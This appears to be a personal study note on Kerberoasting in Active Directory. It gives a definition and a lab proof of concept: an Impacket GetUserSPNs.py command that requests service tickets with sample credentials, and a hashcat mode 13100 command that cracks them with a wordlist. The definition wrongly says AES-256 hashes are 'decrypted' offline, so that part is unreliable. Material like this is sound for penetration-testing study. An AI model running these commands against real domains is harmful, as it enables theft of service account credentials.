<aside> 📌 Summary

</aside>

Kerberoasting

Definition

Kerberoasting is a technique used in cyber attacks to exploit weak service account passwords in a Microsoft Active Directory environment. Attackers target accounts with Service Principal Names (SPNs), requesting a Kerberos ticket-granting service (TGS) ticket for the service. They then use offline cracking to derive the service account's plaintext password from the ticket, as some service account passwords are stored as AES-256 encrypted hashes, which can be decrypted offline.

Group 2796.png

Group 2797.png

Group 2798.png

Group 2799.png

In normal conditions, this TGS is used to access a resource like a server. But there, we will try to crack the service account password hash.

Group 2800.png

Nice video which goes a bit deeper

Nice video which goes a bit deeper

Proof of Concept

TGS request with Impacket

Again with the https://github.com/fortra/impacket library we have a tool for this. This time, we will use GetUserSPNs.py.

GetUserSPNs.py ORB.local/lkisaka:Password1 -dc-ip 10.0.0.12 -request

Untitled

<aside> 💡 Note: this tool, at the opposite of some other tools, requires to use the full domain name. Here ORB.local.

</aside>

Password crack with Hashcat

Find a little more about Hashcat password cracking here Password Cracking with Hashcat. This time we are cracking Kerberos hash of module 13100


hashcat TGS.hash -m 13100 /usr/share/wordlists/rockyou.txt